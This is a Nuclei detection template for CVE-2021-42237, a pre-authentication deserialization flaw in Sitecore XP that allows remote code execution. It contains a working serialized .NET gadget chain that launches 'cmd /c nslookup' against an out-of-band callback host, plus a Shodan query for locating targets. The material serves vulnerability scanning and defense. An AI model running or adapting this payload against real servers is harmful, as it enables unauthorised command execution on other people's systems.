122 lines
8.3 KiB
YAML
122 lines
8.3 KiB
YAML
id: CVE-2021-42237
|
|
|
|
info:
|
|
name: Sitecore Experience Platform Pre-Auth RCE
|
|
author: pdteam
|
|
severity: critical
|
|
description: Sitecore XP 7.5 to Sitecore XP 8.2 Update 7 is vulnerable to an insecure deserialization attack where remote commands can be executed by an attacker with no authentication or special configuration required.
|
|
reference:
|
|
- https://blog.assetnote.io/2021/11/02/sitecore-rce/
|
|
- https://support.sitecore.com/kb?id=kb_article_view&sysparm_article=KB1000776
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-42237
|
|
remediation:
|
|
For Sitecore XP 7.5.0 - Sitecore XP 7.5.2, use one of the following solutions-
|
|
- Upgrade your Sitecore XP instance to Sitecore XP 9.0.0 or higher.
|
|
- Consider the necessity of the Executive Insight Dashboard and remove the Report.ashx file from /sitecore/shell/ClientBin/Reporting/Report.ashx from all your server instances.
|
|
- Upgrade your Sitecore XP instance to Sitecore XP 8.0.0 - Sitecore XP 8.2.7 version and apply the solution below.
|
|
- For Sitecore XP 8.0.0 - Sitecore XP 8.2.7, remove the Report.ashx file from /sitecore/shell/ClientBin/Reporting/Report.ashx from all your server instances.
|
|
For Sitecore XP 8.0.0 - Sitecore XP 8.2.7, remove the Report.ashx file from /sitecore/shell/ClientBin/Reporting/Report.ashx from all your server instances.
|
|
metadata:
|
|
shodan-query: http.title:"SiteCore"
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.80
|
|
cve-id: CVE-2021-42237
|
|
cwe-id: CWE-502
|
|
tags: cve,cve2021,rce,sitecore,deserialization,oast
|
|
|
|
requests:
|
|
- raw:
|
|
- |
|
|
POST /sitecore/shell/ClientBin/Reporting/Report.ashx HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: text/xml
|
|
|
|
<?xml version="1.0" ?>
|
|
<a>
|
|
<query></query>
|
|
<source>foo</source>
|
|
<parameters>
|
|
<parameter name="">
|
|
<ArrayOfstring z:Id="1" z:Type="System.Collections.Generic.SortedSet`1[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]" z:Assembly="System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"
|
|
xmlns="http://schemas.microsoft.com/2003/10/Serialization/Arrays"
|
|
xmlns:i="http://www.w3.org/2001/XMLSchema-instance"
|
|
xmlns:x="http://www.w3.org/2001/XMLSchema"
|
|
xmlns:z="http://schemas.microsoft.com/2003/10/Serialization/">
|
|
<Count z:Id="2" z:Type="System.Int32" z:Assembly="0"
|
|
xmlns="">2</Count>
|
|
<Comparer z:Id="3" z:Type="System.Collections.Generic.ComparisonComparer`1[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]" z:Assembly="0"
|
|
xmlns="">
|
|
<_comparison z:Id="4" z:FactoryType="a:DelegateSerializationHolder" z:Type="System.DelegateSerializationHolder" z:Assembly="0"
|
|
xmlns="http://schemas.datacontract.org/2004/07/System.Collections.Generic"
|
|
xmlns:a="http://schemas.datacontract.org/2004/07/System">
|
|
<Delegate z:Id="5" z:Type="System.DelegateSerializationHolder+DelegateEntry" z:Assembly="0"
|
|
xmlns="">
|
|
<a:assembly z:Id="6">mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</a:assembly>
|
|
<a:delegateEntry z:Id="7">
|
|
<a:assembly z:Ref="6" i:nil="true"/>
|
|
<a:delegateEntry i:nil="true"/>
|
|
<a:methodName z:Id="8">Compare</a:methodName>
|
|
<a:target i:nil="true"/>
|
|
<a:targetTypeAssembly z:Ref="6" i:nil="true"/>
|
|
<a:targetTypeName z:Id="9">System.String</a:targetTypeName>
|
|
<a:type z:Id="10">System.Comparison`1[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]</a:type>
|
|
</a:delegateEntry>
|
|
<a:methodName z:Id="11">Start</a:methodName>
|
|
<a:target i:nil="true"/>
|
|
<a:targetTypeAssembly z:Id="12">System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</a:targetTypeAssembly>
|
|
<a:targetTypeName z:Id="13">System.Diagnostics.Process</a:targetTypeName>
|
|
<a:type z:Id="14">System.Func`3[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]</a:type>
|
|
</Delegate>
|
|
<method0 z:Id="15" z:FactoryType="b:MemberInfoSerializationHolder" z:Type="System.Reflection.MemberInfoSerializationHolder" z:Assembly="0"
|
|
xmlns=""
|
|
xmlns:b="http://schemas.datacontract.org/2004/07/System.Reflection">
|
|
<Name z:Ref="11" i:nil="true"/>
|
|
<AssemblyName z:Ref="12" i:nil="true"/>
|
|
<ClassName z:Ref="13" i:nil="true"/>
|
|
<Signature z:Id="16" z:Type="System.String" z:Assembly="0">System.Diagnostics.Process Start(System.String, System.String)</Signature>
|
|
<Signature2 z:Id="17" z:Type="System.String" z:Assembly="0">System.Diagnostics.Process Start(System.String, System.String)</Signature2>
|
|
<MemberType z:Id="18" z:Type="System.Int32" z:Assembly="0">8</MemberType>
|
|
<GenericArguments i:nil="true"/>
|
|
</method0>
|
|
<method1 z:Id="19" z:FactoryType="b:MemberInfoSerializationHolder" z:Type="System.Reflection.MemberInfoSerializationHolder" z:Assembly="0"
|
|
xmlns=""
|
|
xmlns:b="http://schemas.datacontract.org/2004/07/System.Reflection">
|
|
<Name z:Ref="8" i:nil="true"/>
|
|
<AssemblyName z:Ref="6" i:nil="true"/>
|
|
<ClassName z:Ref="9" i:nil="true"/>
|
|
<Signature z:Id="20" z:Type="System.String" z:Assembly="0">Int32 Compare(System.String, System.String)</Signature>
|
|
<Signature2 z:Id="21" z:Type="System.String" z:Assembly="0">System.Int32 Compare(System.String, System.String)</Signature2>
|
|
<MemberType z:Id="22" z:Type="System.Int32" z:Assembly="0">8</MemberType>
|
|
<GenericArguments i:nil="true"/>
|
|
</method1>
|
|
</_comparison>
|
|
</Comparer>
|
|
<Version z:Id="23" z:Type="System.Int32" z:Assembly="0"
|
|
xmlns="">2</Version>
|
|
<Items z:Id="24" z:Type="System.String[]" z:Assembly="0" z:Size="2"
|
|
xmlns="">
|
|
<string z:Id="25"
|
|
xmlns="http://schemas.microsoft.com/2003/10/Serialization/Arrays">/c nslookup {{interactsh-url}}</string>
|
|
<string z:Id="26"
|
|
xmlns="http://schemas.microsoft.com/2003/10/Serialization/Arrays">cmd</string>
|
|
</Items>
|
|
</ArrayOfstring>
|
|
</parameter>
|
|
</parameters>
|
|
</a>
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: interactsh_protocol # Confirms DNS Interaction
|
|
words:
|
|
- "dns"
|
|
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "System.ArgumentNullException"
|
|
|
|
# Enhanced by mp on 2022/02/08
|